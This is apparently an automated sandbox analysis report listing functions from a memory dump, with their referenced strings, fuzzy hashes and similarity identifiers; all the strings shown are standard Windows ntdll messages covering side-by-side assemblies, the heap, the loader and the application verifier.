Opcode Fuzzy Hash: a2a7ec1e994d5675ab064fe45821582cb32c89f959d181642c333313527453f1
Instruction Fuzzy Hash: 4D81ADB1A40358AFDB20CF99C844BEEBBB9FB49718F50415AF504BB3A4D3B1A941CB50

Function 013D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01412602
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01412498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01412506
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01412412
@, xrefs: 0141259B
RtlpResolveAssemblyStorageMapEntry, xrefs: 0141261F
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01412409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014122E4
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014125EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014124C0
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01412624

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 4f948dca60be797f858b7597a0a69fad4962beb8a75d844110893dc9a2d39761
Instruction ID: 3c3d5200604d591a1ef871409a58d9214fc5136c202ad0eb99f67ceda1b79daa
Opcode Fuzzy Hash: 4f948dca60be797f858b7597a0a69fad4962beb8a75d844110893dc9a2d39761
Instruction Fuzzy Hash: F30272F2D002299BDF31DB58CC80BDAB7B8AB54708F5041EAE60DA7251D7719E84CF59

Function 01448B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

DefaultBrowser_NOPUBLISHERID, xrefs: 01448D00
heapType, xrefs: 01448BCB
SegmentHeap, xrefs: 01448BE9
svchost.exe, xrefs: 01448B68
lsass.exe, xrefs: 01448BA1
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01448BD0
services.exe, xrefs: 01448B96
runtimebroker.exe, xrefs: 01448B73
smss.exe, xrefs: 01448B8B
csrss.exe, xrefs: 01448B80

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 29213ce4f7170da806e5cf5475a1cf458fc0966fa7fdcfd52608f949d5b1b1e3
Instruction ID: f5f526394f9edd92bece8f6e0cdcf3a9b29298e85b4fb3a711310ec7d6629acb
Opcode Fuzzy Hash: 29213ce4f7170da806e5cf5475a1cf458fc0966fa7fdcfd52608f949d5b1b1e3
Instruction Fuzzy Hash: 6551E0B15053129BE335CF58C848BABBBE8EF94244F14091EE999C3260E770D609C792

Function 01450274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 014504D3
About to reallocate block at %p to %Ix bytes, xrefs: 014503BA
Just reallocated block at %p to %Ix bytes, xrefs: 014505F1
HEAP: , xrefs: 014503A6, 014504B5, 014505DD, 01450682, 014506D9
RtlReAllocateHeap, xrefs: 014502BF, 01450362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0145069F
HEAP[%wZ]: , xrefs: 01450399, 014504A8, 014505D0, 01450675, 014506CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 014506EA

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 8344597451a06364442d7289ec54477ecb70ba24edc0aa1d4777afa3c7dd97de
Instruction ID: 327000d8fcf7a15010ff169b81b0b5bd35b62df071bc6eee1a89df31b72b2a50
Opcode Fuzzy Hash: 8344597451a06364442d7289ec54477ecb70ba24edc0aa1d4777afa3c7dd97de
Instruction Fuzzy Hash: 5AD1BD39500686DFDB66DF6CD441AAEBBF1FF5A718F08805AF8499B362C7349981CB10

Function 014289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01428A3D
AVRF: -*- final list of providers -*- , xrefs: 01428B8F
VerifierDebug, xrefs: 01428CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01428A67
VerifierDlls, xrefs: 01428CBD
HandleTraces, xrefs: 01428C8F
VerifierFlags, xrefs: 01428C50

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: c2e738520bdfa99b36d1fea6116ca3eee26369e93994b85d0f40b243ee7c71ee
Instruction ID: cfa2c47b6ae30a82ebadf288bdaee28e76f223410431bba645e8219091f78ef6
Opcode Fuzzy Hash: c2e738520bdfa99b36d1fea6116ca3eee26369e93994b85d0f40b243ee7c71ee
Instruction Fuzzy Hash: 459105716053239BE722DF2DD880B1F7BE4AB64B18F95085FFA406B271C7309885CB95

Function 013AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Exit, xrefs: 013AEB6C
, xrefs: 013AF299
T, xrefs: 013AEB4E
{, xrefs: 01404643
R, xrefs: 013AEB62
LdrpResSearchResourceInsideDirectory Enter, xrefs: 013AEB58

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: ad26a56473745d86c28438530f4ceab05ed583338a7744ef863fa0b2120780e6
Instruction ID: a258746873870a940f38da92aac746737ed68a56293e8f2697ce66668de583f2
Opcode Fuzzy Hash: ad26a56473745d86c28438530f4ceab05ed583338a7744ef863fa0b2120780e6
Instruction Fuzzy Hash: ECA24B74A0562A8FDB65DF19CC887ADBBB5EF45308F5442EAD50DA72A0DB349E81CF00

Function 013D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 0141413A
_LdrpInitialize, xrefs: 014140DF, 01414141, 01414205, 0141425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 014141FE
Delaying execution failed with status 0x%08lx, xrefs: 01414258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 014140D8
minkernel\ntdll\ldrinit.c, xrefs: 014140E9, 0141414B, 0141420F, 01414269

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 9bd2ce64d86546b232d87b65e1a3037f1bc9927fbb21210856a06de2cfa93673
Instruction ID: 6dc07d8f5f316b2de8228538afd3cf960345873b3a415865709ebba2d2584181
Opcode Fuzzy Hash: 9bd2ce64d86546b232d87b65e1a3037f1bc9927fbb21210856a06de2cfa93673
Instruction Fuzzy Hash: E49167B1A00315DBEB36DF19E845BAB3BB5AB61B28F14412EE5107B7A9D7708842C790

Function 0139645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01396496
LdrpInitShimEngine, xrefs: 013F99F4, 013F9A07, 013F9A30
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 013F9A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 013F99ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 013F9A01
minkernel\ntdll\ldrinit.c, xrefs: 013F9A11, 013F9A3A

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: f2d72f96eb4237ef4b8f761793c9605e7e97763eb356bf7604ed5dceec807fcf
Instruction ID: 669aeae735f43249c97ac243d29dbca36914ce7bb6b5b00c7489b9bf07c0419c
Opcode Fuzzy Hash: f2d72f96eb4237ef4b8f761793c9605e7e97763eb356bf7604ed5dceec807fcf
Instruction Fuzzy Hash: DB5195712083059FEB25DF28D881F9B77E8FF94A4CF40491DF6959B264DA30E904CB92

Function 013D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01412180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01412178
SXS: %s() passed the empty activation context, xrefs: 01412165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014121BF
RtlGetAssemblyStorageRoot, xrefs: 01412160, 0141219A, 014121BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0141219F

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: e71c789ffcbe2f4045b837a7d0e9211ee4ac9d53a73e3cc9f865013272700cf4
Instruction ID: dbd989152dfe4d5dba18285d008cfdb03df69cda581d4f594fa9f5980c46998c
Opcode Fuzzy Hash: e71c789ffcbe2f4045b837a7d0e9211ee4ac9d53a73e3cc9f865013272700cf4
Instruction Fuzzy Hash: 6E313737F4032577FB21DB9A9C81F5B7B79DF65A58F25005AFA04A7215D2B09E00C2A0

Function 013DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01418181, 014181F5
LdrpInitializeProcess, xrefs: 013DC6C4
Loading import redirection DLL: '%wZ', xrefs: 01418170
LdrpInitializeImportRedirection, xrefs: 01418177, 014181EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 014181E5
minkernel\ntdll\ldrinit.c, xrefs: 013DC6C3

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: ea9ad9b842329e9b12185550a323e75a1ff4fd23ab1eb95779a3f3c2fbec6311
Instruction ID: 91c09fb0c50f7fc7dc56b29d1ae46659a0c45bd8fccc501c0b9593f4af6c62a8
Opcode Fuzzy Hash: ea9ad9b842329e9b12185550a323e75a1ff4fd23ab1eb95779a3f3c2fbec6311
Instruction Fuzzy Hash: 5431D5726443469FD220EF2DD946E1B7BD4EFA4F28F04055DF9456B3A5E620EC04C7A2

Function 013E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 013E2DF0: LdrInitializeThunk.NTDLL ref: 013E2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013E0D74

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 29c0a590cac46d909c72b6893fa79d2a06fef7ae13ed728ca42ee35ce7d58c8c
Instruction ID: ea1b44612c83a845d2f2f76459b9c20cc82801414775953dc48db82b9e89af00
Opcode Fuzzy Hash: 29c0a590cac46d909c72b6893fa79d2a06fef7ae13ed728ca42ee35ce7d58c8c
Instruction Fuzzy Hash: BE426C71A00715DFDB25CF28C894BAAB7F5FF44308F0445AAE989AB295D770A984CF60

Function 013AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 013AA3F7
8, xrefs: 013AA3E7
LdrResFallbackLangList Exit, xrefs: 013AA3FF
LdrResFallbackLangList Enter, xrefs: 013AA3EF

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 29c25c4cd7a658a35fecde8b36b9de4ba12b460f53b703c7d209baf2b993fa18
Instruction ID: 204c1295ecf6cb6fdea25e1e95f7434effa8584af1124ed56138cf9c616e1a51
Opcode Fuzzy Hash: 29c25c4cd7a658a35fecde8b36b9de4ba12b460f53b703c7d209baf2b993fa18
Instruction Fuzzy Hash: 6EC1AB72108386CFD722CF59C044B6ABBE8FF84708F44486AF9959B7A0E774C949CB56

Function 013D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 013D8422
@, xrefs: 013D8591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013D855E
minkernel\ntdll\ldrinit.c, xrefs: 013D8421

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: a64dd5368e31a0fd2bd25a7fcdb830607e7a4f8d039bfa85eb9824cf2932ebe5
Instruction ID: 910fc1e43f368ee9d7d55eec26748c786223c70199808515d1571b1e60e73307
Opcode Fuzzy Hash: a64dd5368e31a0fd2bd25a7fcdb830607e7a4f8d039bfa85eb9824cf2932ebe5
Instruction Fuzzy Hash: 7F918D72508345AFDB22DF65D840EABBAECBF84748F40096EF68496151E374E9048B62

Function 013D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014122B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014121D9, 014122B1
SXS: %s() passed the empty activation context, xrefs: 014121DE
.Local, xrefs: 013D28D8

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a2eedd3996ee68e9093bd0793340a70d7fc5f6cb22b96faf76e93bd59aeff001
Instruction ID: 498cebb6c29e631443733c6d658d8ac9973cc4ddd3d6659f454fdc802e292440
Opcode Fuzzy Hash: a2eedd3996ee68e9093bd0793340a70d7fc5f6cb22b96faf76e93bd59aeff001
Instruction Fuzzy Hash: 28A1C232901229DBDB25CF58EC84BEAB7B5BF58318F2501EAD908A7355D7709E80CF90

Function 013A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01400FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014010AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01401028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0140106B

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 617530d69ac04d0de30a50cf7ed1f801a30df946257b36800fd6fe2fe8df3f27
Instruction ID: 1539d3f73d3b7c9acd78086e7a19b6aef9021b1a20b32062be4ab396945b33a7
Opcode Fuzzy Hash: 617530d69ac04d0de30a50cf7ed1f801a30df946257b36800fd6fe2fe8df3f27
Instruction Fuzzy Hash: BE71D0B1904305DFCB21DF19C885B9B7FA8EF95768F840469F9888B296D334D588CBD2

Function 013C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0140A992
LdrpDynamicShimModule, xrefs: 0140A998
apphelp.dll, xrefs: 013C2462
minkernel\ntdll\ldrinit.c, xrefs: 0140A9A2

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 9d5116943d00c94ed13824d00ead71c1ea2c0df45508f1c44b756b9069aed898
Instruction ID: 5cd1187c38f9e617cf51e2e2bfb8765a86d599e3dfd8144328c0e4fc5ced6b37
Opcode Fuzzy Hash: 9d5116943d00c94ed13824d00ead71c1ea2c0df45508f1c44b756b9069aed898
Instruction Fuzzy Hash: 40312A71640301ABDB32DF6ED945A6BB7B4FB90B08F26406EE9006B3B5C7705C82CB80

Function 013B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 013B3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013B327D
HEAP[%wZ]: , xrefs: 013B3255

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 3a34ea6c78f2b15db81066b1fcabb2a888e0b4babe59597570acc94d6bf8dcb3
Instruction ID: d68ad08376d6c7dab28369ed048073c6cb588da7280cbe6db381fb01d87e8be0
Opcode Fuzzy Hash: 3a34ea6c78f2b15db81066b1fcabb2a888e0b4babe59597570acc94d6bf8dcb3
Instruction Fuzzy Hash: CE92CC70A042599FEB25CF68C4807EEBBF1FF48308F188159EA59ABB51E734A945CF50

Function 013B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 014050CA
HEAP: , xrefs: 014050BD
HEAP[%wZ]: , xrefs: 014050AE

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: acc3fe85a989618cac2906092293214fb046c80d24e5ebe2643a35d9b2c2a3a2
Instruction ID: 7fb40c92b37dfe70a9f265db27bcdb8c89d4b25320776f5a575f05c7fe25f279
Opcode Fuzzy Hash: acc3fe85a989618cac2906092293214fb046c80d24e5ebe2643a35d9b2c2a3a2
Instruction Fuzzy Hash: 36F1AF70A00605DFEB1ACF69C884BABBBB5FF44308F144169E5169BBA1E734E941CF91

Function 013C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 013C6C24
, xrefs: 0140CA51

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: d72800fc3a49b089c32c94d5ee461d689ad810f21f37271eafe6e9d99edd6d5b
Instruction ID: 2d8c866ff229f57afeefadb52ca258501585c41f5f5dec5bf9e3378f78bfe30d
Opcode Fuzzy Hash: d72800fc3a49b089c32c94d5ee461d689ad810f21f37271eafe6e9d99edd6d5b
Instruction Fuzzy Hash: F0C28F71608345DFDB25CF29C881BABBBE5AF88B18F04896EE989C7351D734D805CB52

Function 0139A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 013FC1E4
UseFilter, xrefs: 0139A1C1
FilterFullPath, xrefs: 013FC2E6

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b142e52da2af92b37f628e34798cf1b4db551a8c8b749f0dab5bb49ec78978da
Instruction ID: 0838c4df1721b2d1131776102a865fcbf105334a6c16c296421bcc718b4d8e1c
Opcode Fuzzy Hash: b142e52da2af92b37f628e34798cf1b4db551a8c8b749f0dab5bb49ec78978da
Instruction Fuzzy Hash: C5A1497594122D9BDF319F68CC88BEAB7B8EF44708F1001EAEA09A7250D7359E84CF50

Function 013C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

Failed to allocated memory for shimmed module list, xrefs: 0140A10F
minkernel\ntdll\ldrinit.c, xrefs: 0140A121
LdrpCheckModule, xrefs: 0140A117

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: cf9182b45cb5aa359c6455c27d45ec5352fe41077e4a4ed2fb5429fc1ac96455
Instruction ID: 6bc9807e501d6eed359ca78e702e9b1c992145d68d1887911921ef54d3e19ed3
Opcode Fuzzy Hash: cf9182b45cb5aa359c6455c27d45ec5352fe41077e4a4ed2fb5429fc1ac96455
Instruction Fuzzy Hash: AF71D0B4A00305DFDF29DF6DC980AAEB7F4FB54A08F14806EE502AB761E634AD41CB40

Function 013B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01405342
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0140534D
HEAP[%wZ]: , xrefs: 01405335

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: abe0e604e01a217d6e8a9277ffcd9ae1775ea8cbf7e198ec612303e37cfe37a9
Instruction ID: 094e1b97e359600220c4c34293abc267e046a73fde07d0a6e3ae41c7249dc3af
Opcode Fuzzy Hash: abe0e604e01a217d6e8a9277ffcd9ae1775ea8cbf7e198ec612303e37cfe37a9
Instruction Fuzzy Hash: EB61A0716003059FDB29CF29C480BABBBF5FF44708F14856AE5558F6A2E770E881CB91

Function 013DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 014182D7
LdrpInitializePerUserWindowsDirectory, xrefs: 014182DE
minkernel\ntdll\ldrinit.c, xrefs: 014182E8

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: fa1e205ffac7834bbee2bfcb4045fb43a7a71158e7d6c9fc46e1f2b9cd1dd9ed
